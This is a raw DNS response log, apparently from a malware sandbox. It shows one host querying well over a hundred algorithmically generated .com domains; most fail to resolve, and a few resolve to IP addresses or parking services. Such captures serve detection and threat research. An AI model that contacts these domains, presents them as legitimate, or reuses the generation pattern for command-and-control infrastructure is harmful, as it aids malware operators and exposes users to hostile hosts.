Aug 23, 2024 18:43:05.946043015 CEST	1.1.1.1	192.168.2.5	0x3ee2	Name error (3)	galyfyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.946738958 CEST	1.1.1.1	192.168.2.5	0x8822	Name error (3)	vonyqok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.947464943 CEST	1.1.1.1	192.168.2.5	0x11ea	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.947896004 CEST	1.1.1.1	192.168.2.5	0xdbaf	Name error (3)	qebyqil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.947905064 CEST	1.1.1.1	192.168.2.5	0xc983	Name error (3)	pupyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.948142052 CEST	1.1.1.1	192.168.2.5	0x360e	Name error (3)	gatyzys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.948302984 CEST	1.1.1.1	192.168.2.5	0x4fa8	Name error (3)	lykyfen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.948775053 CEST	1.1.1.1	192.168.2.5	0xea8f	Name error (3)	lyvymir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.948822021 CEST	1.1.1.1	192.168.2.5	0xe3b5	Name error (3)	lysyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.948867083 CEST	1.1.1.1	192.168.2.5	0xbdae	Name error (3)	vocymut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.949079037 CEST	1.1.1.1	192.168.2.5	0x62d1	Name error (3)	gahydoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.949320078 CEST	1.1.1.1	192.168.2.5	0x5b12	Name error (3)	lyryled.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.949328899 CEST	1.1.1.1	192.168.2.5	0x1406	Name error (3)	gacynuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.949579000 CEST	1.1.1.1	192.168.2.5	0x8b4c	Name error (3)	qetylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.950160027 CEST	1.1.1.1	192.168.2.5	0xdc4a	Name error (3)	purylev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.950396061 CEST	1.1.1.1	192.168.2.5	0x585c	Name error (3)	puvymul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.950577021 CEST	1.1.1.1	192.168.2.5	0xb6d7	Name error (3)	lygysij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.951597929 CEST	1.1.1.1	192.168.2.5	0x6d21	Name error (3)	vowykaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.952326059 CEST	1.1.1.1	192.168.2.5	0xfda4	Name error (3)	gaqyreh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.952671051 CEST	1.1.1.1	192.168.2.5	0xf2fd	Name error (3)	gaqykab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.961086988 CEST	1.1.1.1	192.168.2.5	0xdf76	Name error (3)	gahyvew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.964397907 CEST	1.1.1.1	192.168.2.5	0xd174	Name error (3)	lyrytun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.964413881 CEST	1.1.1.1	192.168.2.5	0xc2f2	Name error (3)	lygyvar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.964706898 CEST	1.1.1.1	192.168.2.5	0xa7b4	Name error (3)	lyxygud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.969676971 CEST	1.1.1.1	192.168.2.5	0x5151	Name error (3)	ganyqow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.969818115 CEST	1.1.1.1	192.168.2.5	0xa366	Name error (3)	vojydam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.969863892 CEST	1.1.1.1	192.168.2.5	0x6025	Name error (3)	vopyzuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.971236944 CEST	1.1.1.1	192.168.2.5	0xf67b	Name error (3)	pufypiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.973084927 CEST	1.1.1.1	192.168.2.5	0x9035	Name error (3)	pujydag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.974518061 CEST	1.1.1.1	192.168.2.5	0x8d7c	Name error (3)	qexynyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.974783897 CEST	1.1.1.1	192.168.2.5	0x9187	Name error (3)	qegysoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.026139021 CEST	1.1.1.1	192.168.2.5	0x642c	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.087907076 CEST	1.1.1.1	192.168.2.5	0x8cad	Name error (3)	vocyjic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.092300892 CEST	1.1.1.1	192.168.2.5	0xf0a8	Name error (3)	qedyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.095402956 CEST	1.1.1.1	192.168.2.5	0xc556	Name error (3)	qeqyreq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.098948002 CEST	1.1.1.1	192.168.2.5	0x4856	Name error (3)	lymywaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.134499073 CEST	1.1.1.1	192.168.2.5	0x8cda	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.207226992 CEST	1.1.1.1	192.168.2.5	0xa9e8	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.254987001 CEST	1.1.1.1	192.168.2.5	0xb6f7	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.267570019 CEST	1.1.1.1	192.168.2.5	0xaea7	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.274702072 CEST	1.1.1.1	192.168.2.5	0xf293	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.275737047 CEST	1.1.1.1	192.168.2.5	0x9a76	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.440164089 CEST	1.1.1.1	192.168.2.5	0xcb9a	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.626286030 CEST	1.1.1.1	192.168.2.5	0x8150	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.697462082 CEST	1.1.1.1	192.168.2.5	0xed46	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.770872116 CEST	1.1.1.1	192.168.2.5	0xf7c1	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.843061924 CEST	1.1.1.1	192.168.2.5	0xa040	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:07.616444111 CEST	1.1.1.1	192.168.2.5	0x75d6	No error (0)	ww25.lyxynyx.com	77026.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:07.616444111 CEST	1.1.1.1	192.168.2.5	0x75d6	No error (0)	77026.bodis.com		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:08.049897909 CEST	1.1.1.1	192.168.2.5	0xd8d0	No error (0)	ww16.vofycot.com	www.sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:08.049897909 CEST	1.1.1.1	192.168.2.5	0xd8d0	No error (0)	www.sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.767851114 CEST	1.1.1.1	192.168.2.5	0x3e1a	Name error (3)	gadypuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.767863035 CEST	1.1.1.1	192.168.2.5	0x9501	Name error (3)	galyvas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768362045 CEST	1.1.1.1	192.168.2.5	0x7d42	Name error (3)	pumyjig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769004107 CEST	1.1.1.1	192.168.2.5	0xcaaf	Name error (3)	qedytul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769885063 CEST	1.1.1.1	192.168.2.5	0xe5a0	Name error (3)	lysytyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770970106 CEST	1.1.1.1	192.168.2.5	0x5222	Name error (3)	pujycov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771049023 CEST	1.1.1.1	192.168.2.5	0x7f72	Name error (3)	lyvyguj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771872044 CEST	1.1.1.1	192.168.2.5	0xb61a	Name error (3)	vopyret.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771883011 CEST	1.1.1.1	192.168.2.5	0xa70d	Name error (3)	lykyvod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771891117 CEST	1.1.1.1	192.168.2.5	0x9d10	Name error (3)	gatyrez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.772188902 CEST	1.1.1.1	192.168.2.5	0x636e	Name error (3)	lyrywax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.772198915 CEST	1.1.1.1	192.168.2.5	0x1804	Name error (3)	pupytyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.773230076 CEST	1.1.1.1	192.168.2.5	0x42aa	Name error (3)	gacyfew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.773240089 CEST	1.1.1.1	192.168.2.5	0x5e7d	Name error (3)	qetyrap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.773869038 CEST	1.1.1.1	192.168.2.5	0x54ce	Name error (3)	puvygyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.774163008 CEST	1.1.1.1	192.168.2.5	0xb843	Name error (3)	gahycib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.774560928 CEST	1.1.1.1	192.168.2.5	0xa87d	Name error (3)	lygyxun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.774626017 CEST	1.1.1.1	192.168.2.5	0x4d2d	Name error (3)	vowyqoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.774902105 CEST	1.1.1.1	192.168.2.5	0x1d07	Name error (3)	qegyxug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.775747061 CEST	1.1.1.1	192.168.2.5	0xe7a6	Name error (3)	qexyfel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.776384115 CEST	1.1.1.1	192.168.2.5	0xb358	Name error (3)	qeqyqiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.778529882 CEST	1.1.1.1	192.168.2.5	0x6db9	Name error (3)	vofyzym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.778940916 CEST	1.1.1.1	192.168.2.5	0x1419	Name error (3)	puzydal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.780975103 CEST	1.1.1.1	192.168.2.5	0xf8b3	Name error (3)	pupylaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.781492949 CEST	1.1.1.1	192.168.2.5	0x8c79	Name error (3)	pumymuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.781940937 CEST	1.1.1.1	192.168.2.5	0x3f0a	Name error (3)	pujypup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.781949997 CEST	1.1.1.1	192.168.2.5	0xb3b9	Name error (3)	qedyleq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.781954050 CEST	1.1.1.1	192.168.2.5	0xc3b0	Name error (3)	gahypus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.781961918 CEST	1.1.1.1	192.168.2.5	0x2934	Name error (3)	vopykak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782157898 CEST	1.1.1.1	192.168.2.5	0xe80	Name error (3)	vocybam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782166958 CEST	1.1.1.1	192.168.2.5	0x8a5d	Name error (3)	lykysix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782175064 CEST	1.1.1.1	192.168.2.5	0xd244	Name error (3)	lysylej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782185078 CEST	1.1.1.1	192.168.2.5	0x7c45	Name error (3)	lyvynen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782195091 CEST	1.1.1.1	192.168.2.5	0x8067	Name error (3)	gacyvah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782203913 CEST	1.1.1.1	192.168.2.5	0x5a88	Name error (3)	puryjil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782469988 CEST	1.1.1.1	192.168.2.5	0x2aca	Name error (3)	vojypuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.782808065 CEST	1.1.1.1	192.168.2.5	0x7e6b	Name error (3)	qegytyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.786374092 CEST	1.1.1.1	192.168.2.5	0xb6bb	Name error (3)	qeqykog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.788158894 CEST	1.1.1.1	192.168.2.5	0x6c00	Name error (3)	puzybep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.791194916 CEST	1.1.1.1	192.168.2.5	0x4ff0	Name error (3)	lymyjon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.791635036 CEST	1.1.1.1	192.168.2.5	0x9caf	Name error (3)	vojycif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.791778088 CEST	1.1.1.1	192.168.2.5	0xbff2	Name error (3)	ganyhuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.791934967 CEST	1.1.1.1	192.168.2.5	0xe91f	Name error (3)	vonyjim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.792939901 CEST	1.1.1.1	192.168.2.5	0xd035	Name error (3)	vocygyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.793102026 CEST	1.1.1.1	192.168.2.5	0x89fd	Name error (3)	volybec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.793418884 CEST	1.1.1.1	192.168.2.5	0x8f2f	Name error (3)	purywop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.796916008 CEST	1.1.1.1	192.168.2.5	0x525a	Name error (3)	gaqyqis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.799310923 CEST	1.1.1.1	192.168.2.5	0x15f7	Name error (3)	pufyxug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.800405025 CEST	1.1.1.1	192.168.2.5	0xdfc9	Name error (3)	gadyzyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.800545931 CEST	1.1.1.1	192.168.2.5	0x883b	Name error (3)	qekysip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.800853968 CEST	1.1.1.1	192.168.2.5	0xccb3	Name error (3)	lymymud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.801115990 CEST	1.1.1.1	192.168.2.5	0x4ef5	Name error (3)	lyxyfar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.801390886 CEST	1.1.1.1	192.168.2.5	0xbfc7	Name error (3)	gatykow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.801877022 CEST	1.1.1.1	192.168.2.5	0x7d78	Name error (3)	lyryjir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.802596092 CEST	1.1.1.1	192.168.2.5	0x65d2	Name error (3)	qebynyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.802901030 CEST	1.1.1.1	192.168.2.5	0xbc3e	Name error (3)	vonymuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.804023981 CEST	1.1.1.1	192.168.2.5	0xc9ab	Name error (3)	qekyvav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.804300070 CEST	1.1.1.1	192.168.2.5	0xd236	Name error (3)	qebyhuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.805196047 CEST	1.1.1.1	192.168.2.5	0x308f	Name error (3)	galydoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.805463076 CEST	1.1.1.1	192.168.2.5	0x9615	Name error (3)	ganynyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.919461012 CEST	1.1.1.1	192.168.2.5	0x7980	Name error (3)	vofypuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.929061890 CEST	1.1.1.1	192.168.2.5	0x216a	Name error (3)	volydot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.931258917 CEST	1.1.1.1	192.168.2.5	0xd89b	Name error (3)	puvybeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.935185909 CEST	1.1.1.1	192.168.2.5	0xe51e	Name error (3)	qetykol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.950680017 CEST	1.1.1.1	192.168.2.5	0x7e93	Name error (3)	lygytyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.950851917 CEST	1.1.1.1	192.168.2.5	0xe1f8	Name error (3)	vowyjut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.951370001 CEST	1.1.1.1	192.168.2.5	0xc891	Name error (3)	qexyvoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.952564955 CEST	1.1.1.1	192.168.2.5	0x6f71	Name error (3)	pufytev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.954000950 CEST	1.1.1.1	192.168.2.5	0x4bad	Name error (3)	gaqyhuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.955862045 CEST	1.1.1.1	192.168.2.5	0x70c3	Name error (3)	volycik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.955909014 CEST	1.1.1.1	192.168.2.5	0x2b03	Name error (3)	puzyciq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.956187963 CEST	1.1.1.1	192.168.2.5	0x7cd1	Name error (3)	pumygyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.958065987 CEST	1.1.1.1	192.168.2.5	0xfd6f	Name error (3)	vonygec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.958113909 CEST	1.1.1.1	192.168.2.5	0xa351	Name error (3)	galycuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.959580898 CEST	1.1.1.1	192.168.2.5	0xa5bd	Name error (3)	qekyxul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.959592104 CEST	1.1.1.1	192.168.2.5	0x7c33	Name error (3)	lysywon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.959959984 CEST	1.1.1.1	192.168.2.5	0x5e9e	Name error (3)	pupywog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.960551023 CEST	1.1.1.1	192.168.2.5	0xf8eb	Name error (3)	ganyfes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.962635994 CEST	1.1.1.1	192.168.2.5	0xe3cf	Name error (3)	vojyzyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.968156099 CEST	1.1.1.1	192.168.2.5	0xe6b8	Name error (3)	qeqyhup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.969337940 CEST	1.1.1.1	192.168.2.5	0x70a5	Name error (3)	gatyqih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.969448090 CEST	1.1.1.1	192.168.2.5	0x4cc3	Name error (3)	qetyquq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.970662117 CEST	1.1.1.1	192.168.2.5	0x7620	Name error (3)	gahyzez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.971493959 CEST	1.1.1.1	192.168.2.5	0x83f3	Name error (3)	lyrymuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.972223043 CEST	1.1.1.1	192.168.2.5	0x416b	Name error (3)	qegylep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.975821018 CEST	1.1.1.1	192.168.2.5	0x3857	Name error (3)	vofyref.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.976516962 CEST	1.1.1.1	192.168.2.5	0xe886	Name error (3)	lyxyvoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.976769924 CEST	1.1.1.1	192.168.2.5	0xdb9f	Name error (3)	qedyrag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.978570938 CEST	1.1.1.1	192.168.2.5	0xbc	Name error (3)	lyxysun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.978790045 CEST	1.1.1.1	192.168.2.5	0x386a	Name error (3)	puzypug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.979038000 CEST	1.1.1.1	192.168.2.5	0xee26	Name error (3)	qeqynel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.979939938 CEST	1.1.1.1	192.168.2.5	0x985a	Name error (3)	lykyxur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.980529070 CEST	1.1.1.1	192.168.2.5	0x9272	Name error (3)	gadyrab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.981623888 CEST	1.1.1.1	192.168.2.5	0xe844	Name error (3)	vopyqim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.982564926 CEST	1.1.1.1	192.168.2.5	0xf8ac	Name error (3)	volypum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.982573986 CEST	1.1.1.1	192.168.2.5	0xcb15	Name error (3)	qedykiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.982647896 CEST	1.1.1.1	192.168.2.5	0x2d8f	Name error (3)	pujyxyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.983014107 CEST	1.1.1.1	192.168.2.5	0xdb23	Name error (3)	lymygyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.983218908 CEST	1.1.1.1	192.168.2.5	0xfe33	Name error (3)	pumybal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.984220982 CEST	1.1.1.1	192.168.2.5	0x2888	Name error (3)	vonybat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.985985994 CEST	1.1.1.1	192.168.2.5	0x27ea	Name error (3)	lykytej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.986479044 CEST	1.1.1.1	192.168.2.5	0x283c	Name error (3)	qekytyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.986490011 CEST	1.1.1.1	192.168.2.5	0x3730	Name error (3)	ganyvoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.986711025 CEST	1.1.1.1	192.168.2.5	0x52e9	Name error (3)	pupyjuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.987200975 CEST	1.1.1.1	192.168.2.5	0xca4	Name error (3)	vopyjuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.988579988 CEST	1.1.1.1	192.168.2.5	0x9e4d	Name error (3)	qebyvop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.989012003 CEST	1.1.1.1	192.168.2.5	0x15b7	Name error (3)	vojyrak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.989161015 CEST	1.1.1.1	192.168.2.5	0xaece	Name error (3)	lyvyvix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.990027905 CEST	1.1.1.1	192.168.2.5	0x6212	Name error (3)	lyvyfad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.990744114 CEST	1.1.1.1	192.168.2.5	0xc35b	Name error (3)	vocydof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.995057106 CEST	1.1.1.1	192.168.2.5	0x5f06	Name error (3)	lygylax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.995382071 CEST	1.1.1.1	192.168.2.5	0x33a	Name error (3)	vowymyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.999578953 CEST	1.1.1.1	192.168.2.5	0xd972	Name error (3)	vofykoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.001148939 CEST	1.1.1.1	192.168.2.5	0xb3f4	Name error (3)	gadykos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.002132893 CEST	1.1.1.1	192.168.2.5	0x8956	Name error (3)	lymyner.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.002681017 CEST	1.1.1.1	192.168.2.5	0x476a	Name error (3)	gaqynyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.005382061 CEST	1.1.1.1	192.168.2.5	0x30	Name error (3)	lysyjid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.008888960 CEST	1.1.1.1	192.168.2.5	0x68b8	Name error (3)	pujyteq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.010534048 CEST	1.1.1.1	192.168.2.5	0xc6bf	Name error (3)	galypyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.013151884 CEST	1.1.1.1	192.168.2.5	0x4d79	Name error (3)	puvycip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.017627954 CEST	1.1.1.1	192.168.2.5	0x80cd	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.076554060 CEST	1.1.1.1	192.168.2.5	0x52a7	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.120083094 CEST	1.1.1.1	192.168.2.5	0xebfb	Name error (3)	puvydov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.123980999 CEST	1.1.1.1	192.168.2.5	0xbd07	Name error (3)	gacydib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.125847101 CEST	1.1.1.1	192.168.2.5	0x2ca7	Name error (3)	purymuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.130218983 CEST	1.1.1.1	192.168.2.5	0xd20	Name error (3)	pufylap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.131917000 CEST	1.1.1.1	192.168.2.5	0x822d	Name error (3)	qexysig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.276767969 CEST	1.1.1.1	192.168.2.5	0xc3f8	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:28.276767969 CEST	1.1.1.1	192.168.2.5	0xc3f8	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
